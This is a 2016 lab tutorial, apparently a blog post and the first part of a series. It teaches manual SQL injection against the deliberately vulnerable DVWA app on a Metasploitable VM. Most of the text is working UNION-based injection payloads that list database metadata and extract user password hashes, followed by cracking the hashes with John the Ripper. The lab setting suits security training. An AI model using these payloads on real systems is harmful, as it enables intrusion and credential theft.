September 16, 2016

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

Let’s start from LAB setup :

> Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.

> Check IP address of both devices.

Step-by-step instruction

1. Open Kali Linux (or BT 5r3)

2. Open your browser and type http://IP address of Metasploitable/dvwa/login.ph

3. Login with user name “admin” and password “password”

4. Click on DVWA Security and set it to low then submit

5. Click on manual SQL injection

6. On User ID box type 1 and Submit

(Php select statement: $getid = “SELECT first_name, last_name FROM

users WHERE user_id = ‘$id’”;)

7. %’ or ‘0’=’0

(mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or

‘0’=’0′;)

8. Get DB version: %’ or 0=0 union select null, version() #

9. Get DB user: %’ or 0=0 union select null, user() #

10. Get DB name: %’ or 0=0 union select null, database() #

11. Get Schima information: %’ and 1=0 union select null, table_name from

information_schema.tables #

12. Get user table in Schema information: %’ and 1=0 union select null,

table_name from information_schema.tables where table_name like ‘user%’#

13. Get all the columns fields in the information_schema user table: %’ and 1=0

union select null, concat(table_name,0x0a,column_name) from

information_schema.columns where table_name = ‘users’ #

14. Let’s get password authentication hash: %’ and 1=0 union select null,

concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

15. Now copy all the hash file in a notepad as below format

E.g. user:password

16. Save it to /pentest/passwords/john by name dvwa_password.txt

17. Open a console and go to /pentest/passwords/john

18. cd /pentest/passwords/john

19. now lunch john the ripper

./john –format=raw-MD5 dvwa_password.txt and hit enter.

(You will get the passwords)

..Ok Gurkhas, we’ll continue this in next part.